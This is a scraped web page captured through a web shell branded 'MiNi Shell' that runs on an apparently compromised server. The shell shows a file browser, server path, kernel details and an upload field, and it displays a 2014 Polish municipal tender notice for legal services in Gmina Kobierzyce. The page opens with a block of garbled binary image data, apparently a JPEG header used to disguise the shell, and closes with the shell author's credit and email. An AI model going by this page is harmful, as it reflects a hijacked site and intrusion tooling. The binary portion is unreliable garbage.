JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140218/56866-N-2014.html

<p class="kh_header"><b>Kobierzyce: Świadczenie usług prawniczych - obsługa prawna wraz z reprezentacją prawną Urzędu Gminy Kobierzyce i innych jednostek organizacyjnych Gminy Kobierzyce</b><br>
<b>Numer ogłoszenia: 56866 - 2014; data zamieszczenia: 18.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług prawniczych - obsługa prawna wraz z reprezentacją prawną Urzędu Gminy Kobierzyce i innych jednostek organizacyjnych Gminy Kobierzyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług prawniczych obejmujących stała i kompleksową:
1.1.	Obsługę prawną Gminy Kobierzyce (organów: Gminy i Rady), Urzędu Gminy Kobierzyce oraz gminnych jednostek oświatowych, obejmująca zakresem wszystkie dziedziny prawa związane z realizacją całości zadań własnych, kompetencji i obowiązków Zamawiającego, w tym w szczególności obejmujące następujące dziedziny:
a)	Prawo samorządowe;
b)	Prawo administracyjne, w tym procedury administracyjne;
c)	Prawo cywilne;
d)	Prawo zamówień publicznych ;
e)	Gospodarka nieruchomościami;
f)	Drogi publiczne;
g)	Planowanie i zagospodarowanie przestrzenne, w tym zakres związany z ochrona gruntów rolnych;
h)	Inwestycje budowlane;
i)	Zbiorowe zaopatrzenie w wodę i zbiorowe odprowadzanie ścieków;
j)	Gospodarowanie zasobem komunalnym (lokale);
k)	Oświata, w tym sprawy z zakresu Karty Nauczyciela 
l)	Ochrona zdrowia, w tym programy zdrowotne opracowywane i realizowane przez jednostkę samorządu terytorialnego;
m)	Podatki, w tym interpretacje indywidualne ;
n)	Finanse publiczne, w tym sprawy związane z dotacjami stowarzyszeń, użytek publiczny, sport, prawo wodne;
o)	Ochrona środowiska, utrzymanie porządku w gminie, odpady komunalne;
p)	Fundusze unijne;
q)	Pomoc publiczna, w tym w formie gminnych programów pomocowych oraz pomoc de minimis;
1.2.	Reprezentację prawną (lub doradztwo  prawne w zakresie reprezentacji prawnej), we wszystkich sprawach Gminy Kobierzyce przed:
a)	Sądami powszechnymi (cywilnymi, pracy, karnymi) oraz Sądem Najwyższym, sądami administracyjnymi (Wojewódzkim i Naczelnym Sądem Administracyjnym), czy sądami polubownymi;
b)	Trybunałem Konstytucyjnym;
c)	Innymi organami orzekającymi lub kontrolami, w tym w szczególności: Wojewodą, Regionalną Izbą Obrachunkową, Komisja Orzekającą w sprawach o naruszenie dyscypliny finansów publicznych, Samorządowym Kolegium Odwoławczym, Krajową Izba Odwoławczą, Najwyższą Izbą Kontroli, Urzędem Kontroli Skarbowej, Prokuraturą, a także innymi organami ochrony prawa, organami podatkowymi i organami administracji publicznej oraz organami egzekucyjnymi.
2.	Szczegółowy zakres realizacji przedmiotu zamówienia obejmuje i stałe doradztwo prawne oraz reprezentacje prawną, polegające na:
a)	Opracowaniu i uzgadnianiu projektów aktów prawnych, w tym Rady Gminy Kobierzyce oraz w razie potrzeby jednostek pomocniczych Gminy Kobierzyce (sołectwa), 
b)	Sporządzaniu opinii prawnych i przygotowaniu wyjaśnień (pism), 
c)	Przygotowaniu (w razie potrzeby) i opiniowaniu dokumentów przetargowych, umów, aneksów i w razie takiej potrzeby: udział w negocjowaniu warunków umów i porozumień zawieranych przez Zamawiającego;
d)	Opiniowaniu aktów wewnętrznych;
e)	Obsłudze prawnej sesji Rady Gminy Kobierzyce lub innych posiedzeń;
f)	Uczestnictwo w wyznaczonych rozprawach i posiedzeniach, sporządzanie wszelkich pism procesowych, w tym także windykacja należności Gminy Kobierzyce od jej dłużników.
3.	Wykonawca będzie realizował zamówienie :
3.1.	Poprzez dedykowany do tego Zespół, składający się z co najmniej 3 radców prawnych / adwokatów posiadających niezbędne doświadczenie wskazane w Rozdziale V pkt. 1 lit. c, wskazanych w ofercie Wykonawcy. Zmiana osób wchodzących w skład Zespołu będzie dopuszczalna wyłącznie w przypadku, gdy osoby wchodzące do Zespołu posiadać będą niezbędne doświadczenie wskazane w Rozdziale V pkt. 1 lit. c, odpowiednio do doświadczenia osoby ustępującej z Zespołu. Jeżeli minimalny skład osobowy Zespołu okaże się niewystarczający do należytego  zapewnienia pełnej i kompleksowej obsługi prawnej, Zespół powinien być rozszerzony przez Wykonawcę o kolejne osoby posiadające niezbędne doświadczenie i wiedzę (Kadra dodatkową);
3.2.	Na stałych dyżurach w siedzibie Zamawiającego (Urzędu Gminy Kobierzyce) w wymiarze 5 dni w tygodniu (po 7 godzin) w godzinach pracy Urzędu Gminy Kobierzyce. Dyżury te pełnić będą wyłącznie osoby posiadające doświadczenie wskazane w Rozdziale V pkt. 1 lit. c, przy czym:
a)	Wymaga się aby na każdym dyżurze przebywała co najmniej jedna osoba spośród wskazanych w ofercie Wykonawcy, posiadająca doświadczenie wskazane w Rozdziale V pkt. 1 lit. c;
b)	Każda z osób wskazanych w ofercie Wykonawcy, posiadająca doświadczenie wskazane w Rozdziale V pkt. 1 lit. c pełnić będzie dyżur w wymiarze nie mniejszym niż 20% miesięcznego wymiaru dyżurów;
c)	W zakresie nie większym niż 20% miesięcznego wymiaru dyżurów dopuszcza się świadczenie pomocy prawnej w formie dyżuru przez radcę prawnego / adwokata lub aplikanta radcowskiego / adwokackiego nieposiadającego minimalnego wymaganego doświadczenia, z zastrzeżeniem nadzoru merytorycznego przez radcę prawnego / adwokata pełniącego funkcję koordynatora obsługi prawnej.
3.3.	 Ze względu na charakter świadczonych usług Zamawiający wskazuje na dyżury jako kluczową część zamówienia i w tym zakresie nie dopuszcza podwykonawstwa,
3.4.	Dodatkowo niezależnie od zakresu objętego stałymi dyżurami Wykonawca zapewni Zamawiającemu w sposób nieograniczony dostępność wszystkich osób wchodzących w skład Zespołu poprzez:
a)	Zapewnienie udziału członków Zespołu w spotkaniach na terenie Gminy Kobierzyce lub innych miejsc stosownie do potrzeb zgłoszonych Zamawiającego;
b)	Świadczenie przez członków Zespołu na bieżąco, 5 dni w tygodniu, pomocy prawnej w formie mailowej, telefonicznej lub faxowej.
3.5.	Poprzez obsługę prawną sesji Rady Gminy Kobierzyce, przy czym obsługę taką mogą pełnić wyłącznie osoby posiadające doświadczenie wskazane w Rozdziale V pkt. 1 lit. c; ze względu na charakter świadczonych usług Zamawiający wskazuje na obsługę sesji Rady Gminy Kobierzyce jako kluczową cześć zamówienia i w tym zakresie nie dopuszcza podwykonawstwa;
3.6.	Poprzez udział we wszystkich rozprawach, posiedzeniach czy innych spotkaniach stosownie do potrzeb wynikających z powierzanej kompleksowej i stałej reprezentacji prawnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nd</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanych (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług w zakresie kompleksowej i stałej obsługi prawnej jednostki samorządu oraz reprezentacji prawnej jednostki samorządu terytorialnego, w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy - w tym okresie). W tym celu Wykonawca musi wykazać, iż:
1)	przez co najmniej 2 lata nieprzerwanie świadczył na rzecz jednostki samorządu terytorialnego usługę: kompleksowej i stałej pomocy prawnej, w ramach której Wykonawca odbywał dyżur w siedzibie Zamawiającego w wymiarze nie mniejszym niż: 25 godzin tygodniowo, obejmującą zakresem wszystkie poniższe dziedziny prawa:
a)	Prawo samorządowe;
b)	Prawo administracyjne, w tym procedury administracyjne;
c)	Prawo cywilne;
d)	Prawo zamówień publicznych ;
e)	Gospodarka nieruchomościami;
f)	Drogi publiczne;
g)	Planowanie i zagospodarowanie przestrzenne, w tym zakres związany z ochrona gruntów rolnych;
h)	Inwestycje budowlane;
i)	    Zbiorowe zaopatrzenie w wodę i zbiorowe odprowadzanie ścieków;
j)	    Gospodarowanie zasobem komunalnym (lokale);
k)	Oświata, w tym sprawy z zakresu Karty Nauczyciela 
l)	    Ochrona zdrowia, w tym programy zdrowotne opracowywane i realizowane przez jednostkę samorządu terytorialnego;
m)	Podatki, w tym interpretacje indywidualne ;
n)	Finanse publiczne, w tym sprawy związane z dotacjami stowarzyszeń, użytek publiczny, sport, prawo wodne;
o)	Ochrona środowiska, utrzymanie porządku w gminie, odpady komunalne;
p)	Fundusze unijne;
q)	Pomoc publiczna, w tym w formie gminnych programów pomocowych oraz pomoc de minimis;
2)	Świadczył na rzecz jednostki samorządu terytorialnego usługi reprezentacji prawnej w postepowaniach przed sądami powszechnymi i administracyjnymi, obejmujące swoim zakresem co najmniej:
a)	20 spraw przed sądami powszechnymi;
b)	20 spraw przed sądami administracyjnymi.
3)	Wykonał na rzecz jednostki samorządu terytorialnego co najmniej jedna usługę w każdym z poniższych zakresów:
a)	Obsługa prawna co najmniej 10 sesji Rady Gminy ( Powiatu / Województwa),
b)	Obsługa prawna postępowania o udzielenie zamówienia publicznego w zakresie odbierania i zagospodarowania odpadów komunalnych;
c)	Obsługa prawna postepowania o udzielenie zamówienia publicznego w zakresie publicznego transportu zbiorowego, 
d)	Złożenie i rejestracja spółki komunalnej oraz wykonywanie przez jednostkę samorządu terytorialnego uprawnień właścicielskich wobec takiej spółki;
e)	Obsługa prawna obejmująca przygotowanie co najmniej 10 porozumień jednostki samorządu terytorialnego z inwestorami prywatnymi realizującymi swoje inwestycje na terenie gminy / powiatu / województwa, w tym co najmniej jedno porozumienie dotyczące inwestycji prywatnej o szacowanej wartości co najmniej 50mln złotych; 
f)	Obsługa prawna w zakresie co najmniej jednego postepowania przed każdym z wymienionych organów: (1) Wojewoda, (2) Regionalna Izba Obrachunkowa, (3) Komisja Orzekająca w sprawach o naruszenie dyscypliny finansów publicznych, (4) Samorządowe Kolegium Odwoławcze, (5) Krajowa Izba Odwoławcza, (6) Najwyższa Izba Kontroli, (7) Urząd Kontroli Skarbowej, (8) Prokuratura;
z podaniem ich rodzaju i wartości, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów potwierdzających, że usługi (pkt. 1), 2), 3) powyżej) zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna dysponowanie co najmniej 3 osobami  uprawnionymi do świadczenia pomocy prawnej, posiadającymi aktualny wpis na listę radców prawnych / adwokatów i spełniającymi poniżej wskazane kryteria:

Osoby zdolne do wykonania zamówienia muszą posiadać min. doświadczenie :
1)	osoba świadcząca obsługę prawną: koordynator - radca prawny / adwokat posiadający co najmniej 5 letnie doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych / adwokatów), a także co najmniej 3 letnie doświadczenie w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego (w tym w formie dyżurów w siedzibie Zamawiającego w wymierzę nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie minimalnego doświadczenia) obejmującej wszystkie spośród dziedzin wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 1) SIWZ oraz posiadający doświadczenie wynikające z realizacji na rzecz jednostki samorządu terytorialnego co najmniej jednej spośród usług wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 2) i 3) SIWZ
2)	osoba świadcząca obsługę prawna: radca prawny / adwokat posiadający co najmniej 3 letnie doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych / adwokatów), a także co najmniej 2 letnie doświadczenie w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego (w tym w formie dyżurów w siedzibie Zamawiającego w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie) obejmującej co najmniej 9 spośród dziedzin wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 1) SIWZ oraz doświadczenie wynikające z realizacji na rzecz jednostki samorządu terytorialnego co najmniej jednej spośród usług wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 2) i 3) SIWZ
3)	osoba świadcząca obsługę prawną: radca prawny / adwokat posiadający co najmniej 6 miesięczne doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych / adwokatów), w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego (w tym w formie dyżurów w siedzibie Zamawiającego w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie) obejmującej co najmniej 9 spośród dziedzin wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 1) SIWZ oraz doświadczenie wynikające z realizacji na rzecz jednostki samorządu terytorialnego co najmniej jednej spośród usług wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 2) i 3) SIWZ
przy czym:
a)	osoby z pkt 2) i 3) winny łącznie posiadać doświadczenie obejmujące wszystkie dziedziny opisane w Rozdziale V pkt. 1 lit. b ppkt. 1);
b)	osoby z pkt. 1), 2) i 3) winny łącznie posiadać doświadczenie obejmujące wszystkie usługi wskazane w Rozdziale V pkt. 1 lit. b ppkt. 2) i 3) SIWZ;
c)	doświadczenie dotyczące usług wskazanych w Rozdziale V pkt. 1 lit. b ppkt. 2) i 3) SIWZ może wynikać z realizacji jednej umowy na rzecz jednostki samorządu terytorialnego (w tym także w ramach stałej i kompleksowej obsługi prawnej opisanej w Rozdziale V pkt. 1 lit. b ppkt. 1) SIWZ lub z realizacji kilku usług na rzecz różnych jednostek samorządu terytorialnego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kadra - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Stron postanowienia określa projekty umów stanowiący załącznik do niniejszej Specyfikacji.
Zamawiający informuje, że zmiany w treści zawartej umowy mogą nastąpić w przypadku okoliczności, których nie można było przewidzieć w chwili jej zawarcia. Zgodnie z tym ustala się następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy:
1) zmiana terminu realizacji zamówienia z  przyczyn nie leżących po stronie Wykonawcy, w przypadku :
pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji zamówienia
z powodów nieprzewidzianyh oraz niezawinionych przez Wykonawcę
2) zmiana nazwy, siedziby stron umowy, numerów kont bankowych, osób do kontaktów pomiędzy stronami umowy oraz innych danych identyfikacyjnych.
3) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
4) dopuszcza się możliwość zmiany terminu realizacji przedmiotu zamówienia w sytuacji, gdy zmiana taka wynika z przyczyn niezależnych od Wykonawcy.
5) w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ n realizację zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pokój 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2014 godzina 12:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pokój 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com